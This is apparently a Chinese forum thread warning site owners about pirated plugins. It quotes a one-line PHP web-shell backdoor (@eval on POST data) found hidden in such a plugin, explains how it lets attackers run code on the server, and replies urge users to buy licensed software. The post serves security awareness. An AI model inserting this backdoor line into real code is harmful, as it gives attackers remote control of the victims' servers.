某盗版插件中惊现一句话木马，小到让你根本无法发现

安全专员

传送门：安全小知识：为什么使用盗版插件容易被挂马！

1. @eval($_POST['a']);

如上面所示，就这么短短的几个字符，隐藏在盗版插件正常代码之中，如果不细心的话，根本无法发现。
不懂php的人，可能会怀疑，这么短的一个代码，就是木马？
eval就是把普通的字符串当做php代码来执行，像上面这个代码就是执行接收到的POST数据，利用这段代码，黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧，盗版插件的安全问题已经不能忽视了！


传送门：安全小知识：为什么使用盗版插件容易被挂马！盗版, 插件, 代码, Mono, 安全

TardisTeam

前排支持，拒绝盗版
如果你只要用了一次盗版插件，一句后门代码，就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单，有的时候还会用“间谍式”写入更多潜在后门入口文件，而且命名法会伪装成正常文件名称，代码可能还是加密，以免被检测，这样就可以留着以后再进行攻击，即使你这时候把盗版插件删除，也是无济于事，还是一样会被攻击，除非你把所有新植入的后门文件也都删除了，否则针对一般站长而言，想要安全，就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护，不但服务费成本高，也可能没法根除到底，对于如果用心经营网站的站长，千万不要选择盗版插件，也不要随意授权网站关键信息资源给第三方，如服务器，FTP等，做好及时性备份，拒绝使用盗版插件或模版

大旗网

坚决不用盗版

TG123999

说的对，支持 正版

lovetvb

哦哦明白了